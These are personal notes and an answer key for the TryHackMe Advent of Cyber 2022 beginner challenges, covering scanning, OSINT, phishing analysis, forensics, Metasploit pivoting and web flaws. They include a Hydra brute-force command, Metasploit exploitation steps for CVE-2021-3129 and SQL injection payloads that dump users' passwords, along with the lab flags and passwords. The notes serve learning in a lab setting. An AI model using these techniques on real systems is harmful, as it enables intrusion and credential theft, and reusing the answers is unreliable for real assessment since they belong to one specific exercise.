Advent of Cyber 2022

Advent of Cyber 2022 is forth yearly advent calendar full of beginner level Cybersecurity challenges.

Day 1 - Someone’s coming to town!

Security frameworks are documented processes that define policies and procedures.

Kill Chain

In

• Reconnaissance
• Weaponisation
• Delivery
• Social Engineering
• Exploitation
• Persistence
• Defence Evasion
• Command & Control

Trough

• Pivoting
• Discovery
• Privilege Escalation
• Execution
• Credential Access
• Lateral Movement

Out

• Collection
• Exfiltration
• Impact
• Objectives

Daily Answers

The Bandit Yeti
THM{IT'S A Y3T1 CHR1$TMA$}

Day 2 - Santa’s Naughty & Nice Log

Logs

Daily Answers

2
webserver.log
Friday
10.10.249.191
santaslist.txt
THM{STOLENSANTASLIST}

Day 3 - Nothing escapes detective McRed

OSINT

Techniques

Google Dorks

• inurl
• filetype
• site
• cache

WHOIS Lookup

domain information can be found at who.is.

Robots.txt

Mainly disallowed directories

Data Breaches

HaveIBeenPwned

GitHub Repos

GitHub repositories can have sensitive information

Daily Answers

NAMECHEAP INC
{THM_OSINT_WORKS}
config.php
qa.santagift.shop
S@nta2022

Day 4 - Scanning through the snow

Scanning

Typically automated set of procedures for identifying live hosts, ports and services. Discover OS’s of target and find vulnerabilities that could be exploited.

Types of scanning

Passive Scanning

• without directly interacting with target.
• packet capture and analysis tools like wireshark.

Active Scanning

• sending packets or queries
• immediate deep scan

Techniques

Network Scanning

Complete network scan include:

• live computers and hosts
• open ports
• IP’s
• services running

Port Scanning

Detect open ports

• port numbers are 0 - 65536
• scanning results
  • closed port - Host is not listening
  • Open port - Host actively accepts connection
  • Filtered port - port is open, host is not accepting connections or accepting connections as per certain criteria like specific IP address

Vulnerability scanning

Proactive automated scanning helps determine if system may be threatened or exploited. Nessus and Acunetix are common tools.

Tools

Network Mapper (NMAP)

• nmap -sS IP - TCP SYN Scan
  • list of live hosts and ports without three-way handshake
  • little stealthier
• nmap -sn IP - Ping Scan
  • scanning live hosts
  • no port checking
• nmap -O IP - OS Scan
• nmap -sV IP - Service Scan

Nikto - open source website vulnerability scanner

• nikto -host IP
• looking for subdomains
• outdated servers
• debug messages

Daily Answers

Apache
ssh
{THM_SANTA_SMB_SERVER}
santa25

Day 5 - He knows when you’re awake

Common Remote Access Tools

• SSH
• RDP - RemoteDesktopProtocol
• VNC - VirtualNetworkComputing

Hydra

hydra -l username -P wordlist.txt server service

• -V - verbose, shows username-passwd combinations tried
• -d - debugging

Daily Answers

1q2w3e4r
THM{I_SEE_YOUR_SCREEN}

Day 6 - It’s beginning to look a lot like phishing

Email Headers

• from
• to
• date
• subject
• return path - “Reply-To” address
• domain key / DKIM Signatures - signatures are used to identify and authenticate emails
• SPF - Server that was used to send the email
• Message ID
• MIME version - understand “non-text” content and attachments
• X-Header
• X-Received - mail servers the email went through
• X-Spam Status - spam score
• X-Mailer - email client name

Quick Email Analysis

Red Flags

• From, To and CC - invalid addresses
• Same From and To
• Different Form and Return-To
• Unofficial email server of sender
• Empty or malformed Message-ID field
• Suspicious hyperlink redirects
• Suspicious Attachments - Check sandboxes like virus total

emlAnalyzer -i /path-to-file/filename --header -u --text --extract-all - extract email attachments. sha256sum file - get sum

Tools

• Email reputation
• VirusTotal
• InQuest - network and file analysis by using threat analytics.
• IPinfo.io
• Talos Reputation - check if provided by Cisco Talos
• Urlscan.io - scan website by simulating user behaviour
• Browserling - sandbox for links
• Wannabrowser - sandbox for links

Daily Answers

[email protected]
[email protected]
Chief Elf
3
AoC2022_Email_Analysis
RISKY
Division_of_labour-Load_share_plan.doc
0827bb9a2e7c0628b82256759f0f888ca1abd6a2d903acdb8e44aca6a1a03467
Defense Evasion
macro_hunter

Day 7 - Maldocs roasting on an open fire

https://gchq.github.io/CyberChef

Regex

regex101.com Everything goes inside [] To escape characters use \ backshash.

Daily Answers

9.49.0
10
mysterygift.exe
hxxps[://]cdn[.]bandityeti[.]THM/files/index/
THM_MYSTERY_FLAG

Day 8 - Last Christmas I gave you my ETH

Remix IDE is safe and controlled enviroment for testing smart contracts

Daily Answers

flag{411_ur_37h_15_m1n3}

Day 9 - Dock the halls

Pivoting

Once an attacker gains initial entry into a system, the compromised machine can be used to send additional web traffic through - allowing previously inaccessible machines to be reached.

Metasploit

Start metasploit with msfconsole command.

• search laravel - search for exploit
  • info 1 - show information about the found exploit by using its ID.
  • use 1 - select exploit to be used
    • show options - show options that module expects
    • set [Option Name] [Value]
    • check - check if target is vulnerable
    • show targets
    • show payloads
    • set LHOST eth0 - set [localhost ip] [ip of interface eth0]
    • exploit / run - run the exploit
    • background - leave from remote shell but keep shell connected
    • sessions - list all current sessions
      • -u ID - uniform; Upgrading shell to meterpreter shell
      • -i ID - interact; use specific shell
    • route - Route traffic to a given subnet through a supplied session
      • route print - Print active routing table
      • route add [IP or Subnet] [Session ID]
        • for example route add 172.28.101.51/32 2
• search postgres
  • use 16 - schemadump
    • set RHOST [DB_IP_ADDR]
• search postgres
  • use 11 - sql
    • set DATABASE postgres
    • set SQL "SELECT * from users"
• search socks - use Metasploit as proxy
  • use 0
    • jobs
      • jobs -k [ID] - kill job by ID
  • curl --proxy socks5://127.0.0.1:1080 http://172.17.0.1
• Proxychains
  • proxychains - use proxy with any command
  • change your proxychains with nano /etc/proxychains4.conf
  • proxychains nmap -F -sV -sT 172.17.0.1

Meterpreter

• help - list all commands
• shell - start new shell inside the host
  • exit - close shell and go back to Meterpreter
• resolve [domain name] - use machines dns to resolve domain name

Docker

Credential are stored usually in following places:

• env - environment variables
• .env file - file on example www-data folder that contains env vars for the webserver.

Container don’t have ip -a or ifconfig commands. Typically, container host is located in 172.17.0.1.

Daily Answers

80
Laravel
CVE-2021-3129
sessions -u -1
/.dockerenv
.env
users
p4$$w0rd
22,80
THM{47C61A0FA8738BA77308A8A600F88E8B}

Extra

• ls -la
• 172.28.101.51 - webservers database

Day 10 - You’re a mean one, Mr. Yeti

Memory Exploitation

Cetus is a browser plugin that allows to explore and modify memory space of Web Assembly games.

To find the memory address of the number Guard is thinking first guess wrong and find that string. You can modify or read that address in bookmarks.

To find Health of the Elf scan memory for LT - Lower Than values and after that take hit and repeat until only few results are left.

Daily Answers

THM{5_star_Fl4gzzz}
THM{yetiyetiyetiflagflagflag}

Day 11 - Not all gifts are nice

Memory Forensics

Memory forensics is the analysis of the volatile memory that is in use when a computer is powered on

Volatility

Official Documentation

Commands:

• python3 vol.py [flags] [scan type]
• python3 vol.py -f workstation.vmem windows.psscan

Scan Types:

• windows.psscan Process Scan
• windows.info Windows Info
• windows.dumpfiles --pid [process ID] list dumpped files related to process
• windows.netstat List network connections at the moment of capture

Flags:

• -f file - memory dump file
• -v verbal - increases verbosity
• -p plugins - override default plugin location
• -o output - specify extracted processes and DLLs storage location

Daily Answers

10
mysterygift.ex
2040
16

Day 12 - Forensic McBlue to the REVscue!

Malware

Malware is software created to harm a computer or an entire network.

Usual behaviour:

• Network connections - external: download payloads, remote access, internal: extend access to other computers.
• Registry key modifications - establish long-term access to the system such as running binaries on startup
• File manipulation - download or create new files.

Handling a malware sample is dangerous.

• Assume samples to infect your system. Executing should not be the first and only step in analysing.
• Run the malware sample in a controlled environment like virtual machine with restricted access to network, maybe.
• Sandboxes provide automated analysis at the disposal of Security Analysts

Static Analysis:

• Analysing without executing
• profiling the binary with its readable information
  • properties
  • program flow
  • strings

Dynamic Analysis:

• Executing in safe environment, like Sandbox.
• See
  • malware live in action
  • exact behaviour
  • how it infects the environment

Basic Static Analysis

Detect It Easy

• strings
• CAPA
• Process Monitor

Daily answers

• 64-bit
• upx
• nim
• 2
• HKCU
• C:Menu.bat
• test.jpg,wishes.bat
• bestfestivalcompany.thm,virustotal.com
• http:// bestfestivalcompany.thm/favicon.ico

Day 13 - Simply having a wonderful pcap time

Daily Answers

• 0.3
• 3389
• RDP
• cdn[.]bandityeti[.]thm,bestfestivalcompany[.]thm
• favicon[.]ico,mysterygift[.]exe
• 10[.]10[.]29[.]186
• cdn[.]bandityeti[.]thm
• Nim httpclient/1.6.8
• 0ce160a54d10f8e81448d0360af5c2948ff6a4dbb493fe4be756fc3e2c3f900f
• 20[.]99[.]133[.]109,20[.]99[.]184[.]37,23[.]216[.]147[.]64,23[.]216[.]147[.]76

Day 14 - I’m dreaming of secure web apps

Daily Answers

• 134
• THM{CLOSE_THE_DOOR}

Day 15 - Santa is looking for a Sidekick

Unrestricted File Upload

Possible exploits:

• remote code execution
  • remote shell
• embedded malware

How to fix?

• File Extension Validation
• File content validation (content type header)
• File size validation
• Save outside web root
• Rename file to prevent attacker accessing it
• Malware scanning
  • ClamAV

Daily Answers

• Unrestricted
• SantaSideKick2
• THM{Naughty.File.Uploads.Can.Get.You.RCE}
• File Extension Validation
• file renaming
• malware scanning

Day 16 - SQLi’s the king, the carolers sing

Preventing SQLi’s:

• type validation like integer
• prepared statements

Injections:

• ?id=1 or 1=1 limit 4,1
• ?id=-1 UNION ALL SELECT null, null, username, password, null, null, null from users
• ?q=99999' union all select null,2,username,password,null,null,null from users -- x

Daily Answers

• THM{McCode, Elf McCode}
• THM{KodeNRoll}
• THM{Are we secure yet?}
• THM{SQLi_who???}

Day 17 - Filtering for Order Amidst Chaos

Input Validation

Using pattern:

<input type="email" id="email" name="email" pattern=".+@tryhackme\.com">

Regex

square brackets match one character:

Any vowel: [aeiou] Any letter: [a-zA-Z] Any lower case letter or number: [a-z0-9]

Operations

• . - wildcard
• * - don’t care if matches anything or not
• + - matches at least once
• \ - escape
• ? - optional token
• ^ and $ - anchors (starting and ending), denote start and end of string we want to match

Examples

• [a-zA-Z0-9]+ - alphanumeric and case insensitive, don’t care how long it is
• ^[a-zA-Z]+[0-9]*$ - start of the string is composed of only letters
• ^[a-z]{3,9}$ - lowercase letters that are in between 3 and 9 characters in length
• ^[a-zA-Z]{3}.{3}$ - starts with 3 letters followed by any 3 characters
• ^(www\.)? - begining has optional www.
• tryhackme\.com$ endswith tryhackme.com

Unique Case of Free-Form Text

• How this piece of data is going to be processed by the rest of the application?
• What will be the context for which this free-form text field will be used?
• Is the free text field necessary?

OWASP cheat sheet

1. Ensure no invalid characters are present through proper encoding
2. Whitelist expected characters and character sets

Daily Answers

• 8
• User35
• 11
• 8
• amg.com
• fedfull.com
• hussain.volt
• 16
• 7

Day 18 - Lumberjack Lenny Learns New Rules

Sigma

Sigma makes it easy to perform content matching based on collected logs to raise threat alerts

YAML

• .yml extension
• # for comment
• : key value pairs
• - array elements

title: Suspicious Local Account Creation
id: 0f06a3a5-6a09-413f-8743-e6cf35561297
status: experimental
description: Detects the creation of a local user account on a computer.
logsource:
  product: windows
  service: security
detection:
  selection:
    EventID: # This shows the search identifier value
      - 4720 # This shows the search's list value
  condition: selection
falsepositives:
  - unknown
level: low
tags:
  - attack.persistence # Points to the MITRE Tactic
  - attack.T1136.001 # Points to the MITRE Technique

Daily Answers

• THM{n0t_just_your_u$ser}
• BanditYetiMini
• THM{wh@t_1s_Runn1ng_H3r3}
• SIGMA_AOC2022Yeti
• THM{sch3dule_0npo1nt_101}
• 2F6CE97FAF2D5EEA919E4393BDD416A7

Day 19 - Wiggles go brrr

Communication Protocols

USART

Universal Syncronous/Asyncronous Receiver Transmitter (USART) communication aka serial connection is protocol that uses two wires. One transmit data TX, other receives RX. It is the most common data transmission protocol in hardware level.

• RX and TX wires
• two wires
• device to device

SPI

Serial Peripheral Interface is mainly used for communications between microprocessors and peripherals like sensor or SD card.

• uses separate clock
• is faster
• more reliable
• RX, TX, SCK
• multiple secondary devices

I2C

Inter-Integrated Circuit

• SDA (Serial Data) and SCL (Serial Clock) wires
• 1008 devices
• slower than SPI

Daily Answers

• Logic Analyser
• Nay
• Yea
• Nay
• Nay
• Yea
• 1008
• 9600
• THM{Hacking.Hardware.Is.Fun}

Day 20 - Binwalkin’ around the Christmas tree

Firmware

Set of instructions running on the hardware’s processor. Enables hardware to communicate with other software running on the device

Firmware reversing

Steps:

1. Get firmware from vendors website or extract it from device
2. Analyse firmware (binary) type 2.1. Metal or OS based?
3. Is firmware encrypted or packet? 3.1 Side channel attacks
4. Once encrypted reverse engineering can be done ls -alh *

Analysis

Static Analysis

Examination of the binary file contents, performing its reverse engineering, and reading the assembly instructions to understand the functionality.

Tools:

• BinWalk
• FirmWalker
• Firmware ModKit (FMK)

Dynamic Analysis

Running the firmware code on actual hardware, observing its behaviour through emulation and hardware/ software based debugging

Tools:

• Qemu
• Gnu DeBugger (GDB)

Daily Answers

• THM{WE_GOT_THE_FIRMWARE_CODE}
• Santa@2022
• 2.6.313

Day 21 - Have yourself a merry little webcam

MQTT

{".html":"10","url":"rtsp://10.10.97.82:8554/randompath"}

Daily Answers

• 1883
• y
• 1.6.9
• THM{UR_CAMERA_IS_MINE}

Day 22 - Threats are failing all around me

Some attack vectors:

• Phishing emails
• Denial of Service
• Web drive-by attacks
• Unpatched Vulnerability exploitation

Attack surface:

• email server
• web server
• end-user machines
• humans

Daily Answers

• THM{4TT4CK SURF4C3 R3DUC3D}

Day 23 - Mission ELFPossible: Abominable for a Day

Daily Answers

• S3cr3tV@ultPW
• THM{EZ_fl@6!}
• MilkAndCookies
• 3XtrR@_S3cr3tV@ultPW
• THM{m0@r_5t3pS_n0w!}
• BanoffeePie
• H0tCh0coL@t3_01
• H0tCh0coL@t3_02
• N3w4nd1m
• Pr0v3dV@ultPW
• N3w4nd1mPr0v3dV@ultPW
• THM{B@d_Y3t1_1s_n@u6hty}
• 2845
• THM{D3f3n5e_1n_D3pth_1s_k00L!!}

Day 24 - Ho, ho, ho, the survey’s short

GG’s, 24 days of challenges are finally over, and it is Christmas. Had lots of fun and learned some new things.

Daily Answers

• Yea